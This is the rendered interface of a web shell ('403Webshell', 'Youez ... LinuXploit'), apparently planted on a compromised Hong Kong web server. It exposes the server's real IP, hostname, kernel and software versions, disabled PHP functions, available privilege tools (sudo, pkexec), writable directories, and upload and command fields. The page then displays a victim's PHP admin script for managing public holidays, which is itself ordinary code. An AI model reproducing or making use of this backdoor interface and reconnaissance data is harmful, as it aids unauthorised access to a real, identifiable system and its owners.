403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/b2b2c/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/b2b2c/webadmin/public_holiday_process.php
<?php
	$page_settings = array(
		'formid'     => 'Approval', // for permission
		'section'    => 'Master', // parent/page title
		'subsection' => 'Public Holiday', // page title
		'domain'     => 'public_holiday', // table/model name
		'access'     => 'GNr', // for permission
	);
	require_once "check_login.php";

	if ($_REQUEST["action"] == "ADD" || $_REQUEST["action"] == "MODIFY") {

		$message = "";

		if (empty($_POST["date"])) {
			$message .= _lang("Please enter Date.") . "\\n\\n";
		} else {
			if (!validateDate($_POST["date"], "Y-m-d")) {
				$message .= _lang("Please enter correct Date.") . "\\n\\n";
			}
		}

		if (empty($_POST["remark"])) {
			$message .= _lang("Please enter Remark.") . "\\n\\n";
		}

		if (!empty($message)) {
			echo "<script>alert('" . $message . "'); history.back();</script>";
			exit;
		}
	}

	if ($_REQUEST["action"] == "ADD") {
		$sql        = "insert into public_holiday (`date`, remark, createby, createdate, lastupby, lastupdate) value (?, ?, ?, ?, ?, ?)";
		$parameters = array($_POST["date"], $_POST["remark"], $_SESSION["cmsloginid"], date("Y-m-d H:i:s"), $_SESSION["cmsloginid"], date("Y-m-d H:i:s"));

		bind_pdo($sql, $parameters);

		header("Location: " . $page_settings["domain"] . "_index.php?msg=1");
	} else if ($_REQUEST["action"] == "MODIFY") {

		$sql        = "update public_holiday set `date`=?, remark=?, lastupby=?, lastupdate=?";
		$parameters = array($_POST["date"], $_POST["remark"], $_SESSION['cmsloginid'], $nowdate);
		$sql .= " where id = ?";
		$parameters[] = (int)$_POST["id"];

		bind_pdo($sql, $parameters);

		header("Location: " . $page_settings["domain"] . "_index.php?msg=2");
	} else if ($_REQUEST["action"] == "DELETE") {
		$id = (int)$_GET["id"];

		$sql        = "update public_holiday set deleted = ?, lastupdate=?, lastupby=? where id = ?";
		$parameters = array(1, date("Y-m-d H:i:s"), $_SESSION['cmsloginid'], $id);
		bind_pdo($sql, $parameters);

		header("Location: " . $page_settings["domain"] . "_index.php?msg=2");
	}


Youez - 2016 - github.com/yon3zu
LinuXploit